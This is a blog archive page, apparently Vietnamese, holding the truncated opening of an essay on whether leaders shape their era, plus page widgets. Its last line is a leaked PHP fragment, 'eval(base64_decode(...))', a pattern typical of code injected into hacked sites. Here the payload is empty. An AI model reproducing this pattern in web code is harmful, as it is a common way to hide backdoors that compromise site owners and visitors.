Archive for November 16th, 2016

LÃNH TỤ VÀ THỜI ĐẠI

LÃNH TỤ VÀ THỜI ĐẠI

Lãnh tụ tạo nên thời đại hay thời đại tạo nên lãnh tụ vẫn còn là một vấn đề được tranh luận nhưng chắc chắn cả hai có một quan hệ hỗ tương, gắn bó chặt chẽ trong đó ý thức của thời đại đóng vai trò quyết định. Nhìn l

11.16.2016 | Tiểu Luận- Chính Luận |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>